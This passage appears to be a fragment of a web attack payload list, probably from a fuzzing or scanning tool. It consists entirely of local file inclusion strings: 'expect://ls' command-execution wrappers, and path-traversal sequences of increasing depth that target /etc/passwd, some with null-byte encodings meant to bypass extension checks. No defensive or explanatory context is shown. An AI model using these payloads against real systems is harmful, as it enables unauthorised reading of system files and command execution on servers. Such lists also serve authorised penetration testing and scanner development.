'expect://ls',
'/expect://ls',
'../expect://ls',
'../../expect://ls',
'etc/passwd%2500',
'/etc/passwd%2500',
'../etc/passwd%2500',
'../../etc/passwd%2500',
'../../../etc/passwd%2500',
'../../../../etc/passwd%2500',
'../../../../../etc/passwd%2500',
'../../../../../../etc/passwd%2500',
'../../../../../../../etc/passwd%2500',
'../../../../../../../../etc/passwd%2500',
'../../../../../../../../../etc/passwd%2500',
'../../../../../../../../../../etc/passwd%2500',
'../../../../../../../../../../../etc/passwd%2500',
'etc/passwd',
'/etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'etc/passwd%00',
'/etc/passwd%00',
'../etc/passwd%00',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
